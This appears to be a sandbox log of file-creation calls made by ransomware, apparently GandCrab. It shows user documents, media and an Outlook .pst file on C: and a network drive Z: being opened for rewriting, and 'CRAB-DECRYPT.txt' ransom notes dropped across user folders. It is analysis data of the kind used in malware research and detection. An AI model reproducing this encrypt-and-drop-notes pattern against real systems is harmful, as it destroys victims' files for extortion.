Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\owR x2a.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\iWJTz4KEmPveSMxUQ8.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\TQB8IjiKavnd9-4DZ\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\TQB8IjiKavnd9-4DZ\emVhgx6y97.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\VPhwHa8l1\TQB8IjiKavnd9-4DZ\l6Bs1VDS IveszkK_T.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\qU7Og9CaR8xuh.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\XhgAzlnnal4On.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\TaihMyjD\YLRzWU41I lCyJDHV C6.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\lEAREuPn69.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\vXvj4GLL.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\woCvVol6lG6hpZs1f-.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\YEJo-cDCntFKzkvH4cb.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\qnnrT9SEOOv4oMd88.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Desktop\yOuNI.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Desktop\_Wm7kki7DgA3B5.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\eCV9B6Keul.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Documents\-1nTMjoJ7ib3ZR0e.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\pWw3Texk6CwVcTz.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\0Ai_ wHAH.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\1PJlex.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\1ulDdE.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\TkryzlAhWDjxy.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\2Hv5hFFMzd5aNPk.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\2LGO84j-W4Ss.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\NXOcFmcZH0kfs1V2.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\3qZsnXbZ8z1egA.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\3SReUsWYQe.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\4pdLU7.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\cxc1c8A9xEZm1pp.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\4RmmFCk0BX7QahWLqVx5.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\5vN57VGzAE.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\FsFwfuaCG.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\6eUPbghm7ZBluxc.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\6ng6JlXHb8hwuQ.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\7oAyWmRuk6Rev8e.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\7_Zy.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\95qK9jgeM.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\9ck.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\1F9dzJR3Dq.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\A8oskYh.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\B1zUmc.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\BHVRr3kYc.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\BkxfwmXNXil_cYhxfQs.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\CBQF.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\o4isx.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\CJMNuW 4cb0wpI.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\D1dhLhbgxoT.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\d2JVpicU.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\dLkR7Xv.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\DP6fTEj02K06.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\2XzzHT1hfS0s9l.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\DZBYR6C6eJk cv.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\ea-CnW.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\eCeaLvu8v-ssV7jBsi.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\EJg4n2H-eOKc-FT-vy.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\eTgm6R0B9s.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\fQ9SmMLDV5wcEGYOA.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\m9asRMP8HoSL6.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\fXjGYhYKUU9N5 9E.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\ggEd2ZFiTn.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\Gj1AETY8gGZf_ZpBFT.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\gUtLmVES.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\H68iskuDWS.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\HbIBqmIdwFh5l3CkQWW.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\PlmVZkn.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\HGetLP aV.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\i-UF7_g9OFxd.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\JPYL7tZbQpiqjE0ymjrJ.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\JVuFz.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\jXQiT7GR.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\D9xhD4Vtl9zeKaqi.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\K5Mygl.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\LHGY.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\Mc2EgDqsDljYTmV.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\mCux0hJieHBSy1 5U1.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\mFFs.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\diCHxx1R37p96mJV.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\MfNXQZkG0M.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\mJGjStuw.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\MMcXOPb7kn8VzqaF4K.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Documents\MyVpu.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\8KdP1zVgyza2WB4YuYBy.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\M_CHyV1AF6ug5VOwl.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\n4OwU.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\Ndo7yk7mA1 4f9Z.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\OQgO-r48LdFGEy63aCY.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\Outlook Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Documents\Outlook Files\ldkhh@oedd.de.pst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\9HqwEbX7Ln7H.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\P9fCWBOY-l.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\pOCdHdUN5EEiedm5Ct.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\pUsocY.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\q8mF0_KHya0K9utMH0cG.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\qNm_xzCD.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\9ZTbafp.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\QO EUigo4EXK9olc0XpX.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\r1sp-wV96nAjkRK.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\r6PXFHzw-.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\REkt.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\RHbIT0mnhhyB.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\EdkUgdunNhUsDwiV5VL.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\RlQf78f7r3L7_m.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\Rr9y.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\S9-7VoNLm5We-.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\SFJfWe_xbxjr_0QHJ7.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\sYdi1iD2SlroiBmUO1.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\s_wtt21h2.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\RxFoEpC5uC.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\T6SK.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\T87fWEkNQqVgt.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\u5yfJ5Dj8.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\uok42anf6rkWD5o.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\uXwt eePK.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\sifLLk9MkzE.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\UZGaw3RhFkNhQARy6.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\w7n_pc.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\WAsSzGR_aBTObV.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\wbxbaYD9AL.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\6dWSrqDXT.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\wRaq.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\qfhJe21I1iEPfDSocb1f.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\qmtME3h8QVa74sICzw.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\wVGypC6c_8.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\x-tAr U1thhtmy24.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\X92otNpR-x5Zma_ Dmt_.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\xHjYo.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\xmFZUHlNX2960gz.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\YafdM6xMz.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\YUFw65UL.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\yVJ4yghUyczj_wPOEFm.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\RaZrRuMAHW1D9.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Documents\Z0wcTdfJmjLHe2Dd.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\_3noyG57lzSpeak.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Documents\_wnatvZlC6XqeL.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Favorites\360 Safeguard.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Avito.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
